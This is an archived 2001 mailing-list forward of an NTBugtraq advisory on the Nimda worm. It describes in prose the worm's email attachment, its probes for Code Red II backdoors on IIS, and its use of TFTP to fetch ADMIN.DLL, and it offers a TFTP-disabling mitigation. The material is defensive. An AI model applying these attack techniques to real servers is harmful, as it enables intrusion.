---------- Forwarded message ---------- Date: Tue, 18 Sep 2001 14:35:59 -0700 From: "Kohlenberg, Toby" <toby.kohlenberg@private> To: "'toby@private'" <toby@private> Subject: FW: [iwar] [fc:More.on.the.worms...] -----Original Message----- From: Fred Cohen [mailto:fc@private] Sent: Tuesday, September 18, 2001 9:21 AM To: iwar@private Subject: [iwar] [fc:More.on.the.worms...] There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS. It appears that the attacks can come both from email and from the network. A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.) The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities. One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box. Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP. Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following; edit %systemroot/system32/drivers/etc/services. change the line; tftp 69/udp to; tftp 0/udp thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed. More information as it arises. Cheers, Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.5.2 iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6 iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO hSW7yN2lhJc= =YAwc -----END PGP SIGNATURE----- ------------------------ Yahoo! Groups Sponsor ---------------------~--> Do you need to encrypt all your online transactions? Secure corporate intranets? Authenticate your Web sites? Whatever security your site needs, you'll find the perfect solution here! http://us.click.yahoo.com/wOMkGD/Q56CAA/yigFAA/kgFolB/TM ---------------------------------------------------------------------~-> ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:06 PDT